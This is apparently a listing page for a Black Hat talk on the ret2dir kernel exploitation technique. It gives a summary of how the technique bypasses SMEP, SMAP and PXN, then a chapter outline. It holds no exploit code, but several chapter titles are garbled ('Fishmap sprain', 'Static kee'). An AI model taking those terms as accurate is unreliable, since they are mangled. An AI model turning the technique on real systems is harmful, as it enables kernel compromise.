Ret2dir - Deconstructing Kernel Isolation

Explore kernel isolation vulnerabilities and a new exploitation technique called return-to-direct-mapped memory (ret2dir) in this Black Hat conference talk. Delve into the weaknesses of existing kernel protection mechanisms like SMEP, SMAP, and PXN. Learn how ret2dir bypasses these safeguards by leveraging implicit data sharing in OS design. Examine techniques for constructing ret2dir exploits against various Linux targets and architectures. Understand the implications for kernel security and discover potential mitigation strategies, including an exclusive page frame ownership scheme for the Linux kernel. Gain insights into kernel space layout, physical memory management, and the intricacies of kernel exploitation through detailed explanations and demonstrations.

Introduction
About me
Agenda
Kernel Vulnerabilities
Linux
Kernel Attack Model
Why do they work
Protections
Summary
Questions
Return to Direct Map Memory
Kernel Space Layout
Role of Kernel Space Layout
Properties of the Region
Threat Model
Addressaliasing
Attack
Location of synonym
Problems
How
Second problem
How Linux manages physical memory
How Linux manages page frames
What if page frames are not available
Fishmap sprain
Fishmap signatures
Vulnerability overview
Vulnerability data structure
Static kee
How to abuse it
How it works
What happens if this map is not executable
How this works
Demo
Exploit DB
Probability of success
Pagegas